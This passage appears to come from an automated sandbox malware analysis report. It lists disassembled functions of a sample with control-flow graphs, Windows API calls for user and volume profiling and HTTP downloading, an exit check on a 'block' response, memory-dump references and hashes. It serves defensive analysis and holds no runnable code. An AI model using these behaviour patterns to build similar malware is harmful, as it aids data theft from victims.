                                      • Part of subcall function 008E29E0: RtlAllocateHeap.NTDLL(00000000), ref: 008E2A16
                                      • Part of subcall function 008E29E0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 008E2A2A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1DB0
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 008E1DE4
                                    • CloseHandle.KERNEL32(00000000), ref: 008E1DF1
                                    • Sleep.KERNEL32(00001770), ref: 008E1DFC
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 008E1E0A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 008E1E1B
                                    • CloseHandle.KERNEL32(00000000), ref: 008E1E2E
                                    • ExitProcess.KERNEL32 ref: 008E1E36
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$lstrcpy$lstrcatlstrlen$Process$EventExit$CloseHandleHeapOpenUser$AllocateCreateDefaultLangNameSleep
                                    • String ID:
                                    • API String ID: 4175272417-0
                                    • Opcode ID: 435e053df291bbb19a74951d01c1d8a2596f27ef6258999d1bf700a5bc533538
                                    • Instruction ID: f6faff40c96a5d1afdf5e29d2d0ad1ae7a15fc36e8cae1733c77a7c9d8f26ce7
                                    • Opcode Fuzzy Hash: 435e053df291bbb19a74951d01c1d8a2596f27ef6258999d1bf700a5bc533538
                                    • Instruction Fuzzy Hash: A3615831A0064AABCB21ABF59C8DF7F7A79FF46741F144028F905D62A1DF749806CB62
                                    Function 008C6B80 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 229networkstringfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2188 8c6b80-8c6ba4 call 8c2840 2191 8c6bb5-8c6bd7 call 8c4ae0 2188->2191 2192 8c6ba6-8c6bab 2188->2192 2196 8c6bd9 2191->2196 2197 8c6bea-8c6bfa call 8c2840 2191->2197 2192->2191 2193 8c6bad-8c6baf lstrcpy 2192->2193 2193->2191 2198 8c6be0-8c6be8 2196->2198 2201 8c6bfc-8c6c02 lstrcpy 2197->2201 2202 8c6c08-8c6c35 InternetOpenA StrCmpCA 2197->2202 2198->2197 2198->2198 2201->2202 2203 8c6c3a-8c6c3c 2202->2203 2204 8c6c37 2202->2204 2205 8c6de8-8c6dfb call 8c2840 2203->2205 2206 8c6c42-8c6c62 InternetConnectA 2203->2206 2204->2203 2215 8c6dfd-8c6dff 2205->2215 2216 8c6e09-8c6e20 call 8c2930 * 2 2205->2216 2207 8c6c68-8c6c9d HttpOpenRequestA 2206->2207 2208 8c6de1-8c6de2 InternetCloseHandle 2206->2208 2210 8c6dd4-8c6dde InternetCloseHandle 2207->2210 2211 8c6ca3-8c6ca5 2207->2211 2208->2205 2210->2208 2213 8c6cbd-8c6ced HttpSendRequestA HttpQueryInfoA 2211->2213 2214 8c6ca7-8c6cb7 InternetSetOptionA 2211->2214 2217 8c6cef-8c6d13 call 8e7210 call 8c2930 * 2 2213->2217 2218 8c6d14-8c6d24 call 8e3d30 2213->2218 2214->2213 2215->2216 2219 8c6e01-8c6e03 lstrcpy 2215->2219 2218->2217 2228 8c6d26-8c6d28 2218->2228 2219->2216 2230 8c6dcd-8c6dce InternetCloseHandle 2228->2230 2231 8c6d2e-8c6d47 InternetReadFile 2228->2231 2230->2210 2231->2230 2233 8c6d4d 2231->2233 2235 8c6d50-8c6d55 2233->2235 2235->2230 2237 8c6d57-8c6d7d call 8e7340 2235->2237 2240 8c6d7f call 8c2930 2237->2240 2241 8c6d84-8c6d91 call 8c2840 2237->2241 2240->2241 2245 8c6da1-8c6dcb call 8c2930 InternetReadFile 2241->2245 2246 8c6d93-8c6d97 2241->2246 2245->2230 2245->2235 2246->2245 2247 8c6d99-8c6d9b lstrcpy 2246->2247 2247->2245
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C6BAF
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C6C02
                                    • InternetOpenA.WININET(008ED014,00000001,00000000,00000000,00000000), ref: 008C6C15
                                    • StrCmpCA.SHLWAPI(?,0053E908), ref: 008C6C2D
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008C6C55
                                    • HttpOpenRequestA.WININET(00000000,GET,?,0053E370,00000000,00000000,-00400100,00000000), ref: 008C6C90
                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008C6CB7
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008C6CC6
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 008C6CE5
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008C6D3F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C6D9B
                                    • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 008C6DBD
                                    • InternetCloseHandle.WININET(00000000), ref: 008C6DCE
                                    • InternetCloseHandle.WININET(?), ref: 008C6DD8
                                    • InternetCloseHandle.WININET(00000000), ref: 008C6DE2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008C6E03
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                    • String ID: ERROR$GET$pS
                                    • API String ID: 3687753495-795038753
                                    • Opcode ID: 369a59ffe17a8c5cbf05f051ec94ba8e70cecc0aa8d449cf8aaedcb73ab5dae1
                                    • Instruction ID: e8049413e6433234a60eb29c7972744bc1ab6f11483593203d042ce4b6ba2fd5
                                    • Opcode Fuzzy Hash: 369a59ffe17a8c5cbf05f051ec94ba8e70cecc0aa8d449cf8aaedcb73ab5dae1
                                    • Instruction Fuzzy Hash: 3D815A71A01219ABEB20DFA4DC49FAE77B8FF44700F144168BA05E7280EB74ED05CBA1
                                    Function 008D8D00 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2250 8d8d00-8d8d24 StrCmpCA 2251 8d8d2d-8d8d46 2250->2251 2252 8d8d26-8d8d27 ExitProcess 2250->2252 2254 8d8d4c-8d8d51 2251->2254 2255 8d8f42-8d8f4f call 8c2930 2251->2255 2257 8d8d56-8d8d59 2254->2257 2259 8d8d5f 2257->2259 2260 8d8f23-8d8f3c 2257->2260 2261 8d8ecf-8d8edd StrCmpCA 2259->2261 2262 8d8ee8-8d8efa lstrlen 2259->2262 2263 8d8de4-8d8df2 StrCmpCA 2259->2263 2264 8d8e04-8d8e18 StrCmpCA 2259->2264 2265 8d8d66-8d8d75 lstrlen 2259->2265 2266 8d8e1d-8d8e2b StrCmpCA 2259->2266 2267 8d8e3d-8d8e4b StrCmpCA 2259->2267 2268 8d8e5d-8d8e6b StrCmpCA 2259->2268 2269 8d8e7d-8d8e8b StrCmpCA 2259->2269 2270 8d8e9d-8d8eab StrCmpCA 2259->2270 2271 8d8dba-8d8dc9 lstrlen 2259->2271 2272 8d8eb6-8d8ec4 StrCmpCA 2259->2272 2273 8d8d90-8d8d9f lstrlen 2259->2273 2260->2255 2292 8d8d53 2260->2292 2261->2260 2284 8d8edf-8d8ee6 2261->2284 2285 8d8efc-8d8f01 call 8c2930 2262->2285 2286 8d8f04-8d8f10 call 8c2840 2262->2286 2263->2260 2275 8d8df8-8d8dff 2263->2275 2264->2260 2280 8d8d7f-8d8d8b call 8c2840 2265->2280 2281 8d8d77-8d8d7c call 8c2930 2265->2281 2266->2260 2276 8d8e31-8d8e38 2266->2276 2267->2260 2277 8d8e51-8d8e58 2267->2277 2268->2260 2278 8d8e71-8d8e78 2268->2278 2269->2260 2279 8d8e91-8d8e98 2269->2279 2270->2260 2282 8d8ead-8d8eb4 2270->2282 2289 8d8dcb-8d8dd0 call 8c2930 2271->2289 2290 8d8dd3-8d8ddf call 8c2840 2271->2290 2272->2260 2283 8d8ec6-8d8ecd 2272->2283 2287 8d8da9-8d8db5 call 8c2840 2273->2287 2288 8d8da1-8d8da6 call 8c2930 2273->2288 2275->2260 2276->2260 2277->2260 2278->2260 2279->2260 2308 8d8f13-8d8f15 2280->2308 2281->2280 2282->2260 2283->2260 2284->2260 2285->2286 2286->2308 2287->2308 2288->2287 2289->2290 2290->2308 2292->2257 2308->2260 2309 8d8f17-8d8f19 2308->2309 2309->2260 2310 8d8f1b-8d8f1d lstrcpy 2309->2310 2310->2260
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 105468ebb906276ee43720a006808be73f886e0ea423f86826578c4cacc23840
                                    • Instruction ID: 820b43d02d385dc14f587f245d5cede649c4d74f2771e829735562e25730766a
                                    • Opcode Fuzzy Hash: 105468ebb906276ee43720a006808be73f886e0ea423f86826578c4cacc23840
                                    • Instruction Fuzzy Hash: 425139B0644A05EFC7209FB5E884B3B7BF5FB44B08B104A2EE592DA760DF78E4418B51
                                    Function 008E26E0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2311 8e26e0-8e2723 GetWindowsDirectoryA 2312 8e272c-8e278a GetVolumeInformationA 2311->2312 2313 8e2725 2311->2313 2314 8e278c-8e2792 2312->2314 2313->2312 2315 8e27a9-8e27c0 GetProcessHeap RtlAllocateHeap 2314->2315 2316 8e2794-8e27a7 2314->2316 2317 8e27c6-8e27e4 wsprintfA 2315->2317 2318 8e27c2-8e27c4 2315->2318 2316->2314 2319 8e27fb-8e2812 call 8e7210 2317->2319 2318->2319
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 008E271B
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,008D9416,00000000,00000000,00000000,00000000), ref: 008E274C
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008E27AF
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E27B6
                                    • wsprintfA.USER32 ref: 008E27DB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                    • String ID: :\$C
                                    • API String ID: 2572753744-3309953409
                                    • Opcode ID: 552e6847a073f157116343ff19e0c2bc004b27da065e3ef39f0336820337a1d9
                                    • Instruction ID: 804281875483187cc9f129b346b96238548edf3c8b634e39094fc8164e7ffa91
                                    • Opcode Fuzzy Hash: 552e6847a073f157116343ff19e0c2bc004b27da065e3ef39f0336820337a1d9
                                    • Instruction Fuzzy Hash: AD315EB19082499BCB14CFF99D85AAFBFBCFB59744F000169E505E7650E2349A008BA1
                                    Function 008C4AE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2322 8c4ae0-8c4aee 2323 8c4af0-8c4af5 2322->2323 2323->2323 2324 8c4af7-8c4b68 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 8c2930 2323->2324
                                    APIs
                                    • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 008C4B17
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 008C4B21
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 008C4B2B
                                    • lstrlen.KERNEL32(?,00000000,?), ref: 008C4B3F
                                    • InternetCrackUrlA.WININET(?,00000000), ref: 008C4B47
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ??2@$CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1683549937-4251816714
                                    • Opcode ID: d56fa4313a1602cf9f5e5a77cbbfdb64953a100a309c5aba9dc355cc0e070267
                                    • Instruction ID: deb17bb72578fc03a66b27ef3b3181a082378e96e33871b35d6dbc7fc16e1329
                                    • Opcode Fuzzy Hash: d56fa4313a1602cf9f5e5a77cbbfdb64953a100a309c5aba9dc355cc0e070267
                                    • Instruction Fuzzy Hash: 6A011B71D00218AFDB00DFA9EC45B9EBBB8EB08320F00412AF914E7290DB745905CBD4
                                    Function 008DEFE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2327 8defe0-8df005 call 8c2840 2330 8df019-8df01d call 8c6b80 2327->2330 2331 8df007-8df00f 2327->2331 2334 8df022-8df038 StrCmpCA 2330->2334 2331->2330 2333 8df011-8df013 lstrcpy 2331->2333 2333->2330 2335 8df03a-8df052 call 8c2930 call 8c2840 2334->2335 2336 8df061-8df068 call 8c2930 2334->2336 2345 8df095-8df0f0 call 8c2930 * 10 2335->2345 2346 8df054-8df05c 2335->2346 2342 8df070-8df078 2336->2342 2342->2342 2344 8df07a-8df087 call 8c2840 2342->2344 2344->2345 2351 8df089 2344->2351 2346->2345 2350 8df05e-8df05f 2346->2350 2353 8df08e-8df08f lstrcpy 2350->2353 2351->2353 2353->2345
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DF013
                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008DF02E
                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 008DF08F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID: ERROR
                                    • API String ID: 3722407311-2861137601
                                    • Opcode ID: a4516453c1deb5cab6b0a301d5df676b8277b26c53e99e7ac4b56ba50710ad48
                                    • Instruction ID: aa1c3a054a1e0dde221d1d276953fab834a350e0746500512e9b6740d6964479
                                    • Opcode Fuzzy Hash: a4516453c1deb5cab6b0a301d5df676b8277b26c53e99e7ac4b56ba50710ad48
                                    • Instruction Fuzzy Hash: CE21EA70610A069BCB24BF79C846FAA3BB4FF04304F444629B949DB293DF30DC258791
                                    Function 008D8CE1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2408 8d8ce1-8d8d24 StrCmpCA 2410 8d8d2d-8d8d46 2408->2410 2411 8d8d26-8d8d27 ExitProcess 2408->2411 2413 8d8d4c-8d8d51 2410->2413 2414 8d8f42-8d8f4f call 8c2930 2410->2414 2416 8d8d56-8d8d59 2413->2416 2418 8d8d5f 2416->2418 2419 8d8f23-8d8f3c 2416->2419 2420 8d8ecf-8d8edd StrCmpCA 2418->2420 2421 8d8ee8-8d8efa lstrlen 2418->2421 2422 8d8de4-8d8df2 StrCmpCA 2418->2422 2423 8d8e04-8d8e18 StrCmpCA 2418->2423 2424 8d8d66-8d8d75 lstrlen 2418->2424 2425 8d8e1d-8d8e2b StrCmpCA 2418->2425 2426 8d8e3d-8d8e4b StrCmpCA 2418->2426 2427 8d8e5d-8d8e6b StrCmpCA 2418->2427 2428 8d8e7d-8d8e8b StrCmpCA 2418->2428 2429 8d8e9d-8d8eab StrCmpCA 2418->2429 2430 8d8dba-8d8dc9 lstrlen 2418->2430 2431 8d8eb6-8d8ec4 StrCmpCA 2418->2431 2432 8d8d90-8d8d9f lstrlen 2418->2432 2419->2414 2451 8d8d53 2419->2451 2420->2419 2443 8d8edf-8d8ee6 2420->2443 2444 8d8efc-8d8f01 call 8c2930 2421->2444 2445 8d8f04-8d8f10 call 8c2840 2421->2445 2422->2419 2434 8d8df8-8d8dff 2422->2434 2423->2419 2439 8d8d7f-8d8d8b call 8c2840 2424->2439 2440 8d8d77-8d8d7c call 8c2930 2424->2440 2425->2419 2435 8d8e31-8d8e38 2425->2435 2426->2419 2436 8d8e51-8d8e58 2426->2436 2427->2419 2437 8d8e71-8d8e78 2427->2437 2428->2419 2438 8d8e91-8d8e98 2428->2438 2429->2419 2441 8d8ead-8d8eb4 2429->2441 2448 8d8dcb-8d8dd0 call 8c2930 2430->2448 2449 8d8dd3-8d8ddf call 8c2840 2430->2449 2431->2419 2442 8d8ec6-8d8ecd 2431->2442 2446 8d8da9-8d8db5 call 8c2840 2432->2446 2447 8d8da1-8d8da6 call 8c2930 2432->2447 2434->2419 2435->2419 2436->2419 2437->2419 2438->2419 2467 8d8f13-8d8f15 2439->2467 2440->2439 2441->2419 2442->2419 2443->2419 2444->2445 2445->2467 2446->2467 2447->2446 2448->2449 2449->2467 2451->2416 2467->2419 2468 8d8f17-8d8f19 2467->2468 2468->2419 2469 8d8f1b-8d8f1d lstrcpy 2468->2469 2469->2419
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 63c74883ee9c1cab07a45cf96c74f4fc555039d25b572f6093118541a5110776
                                    • Instruction ID: 2c2bbe82efd5122f8cbf6edb181fa06275062febba8a5fd1985a0aebb5107422
                                    • Opcode Fuzzy Hash: 63c74883ee9c1cab07a45cf96c74f4fc555039d25b572f6093118541a5110776
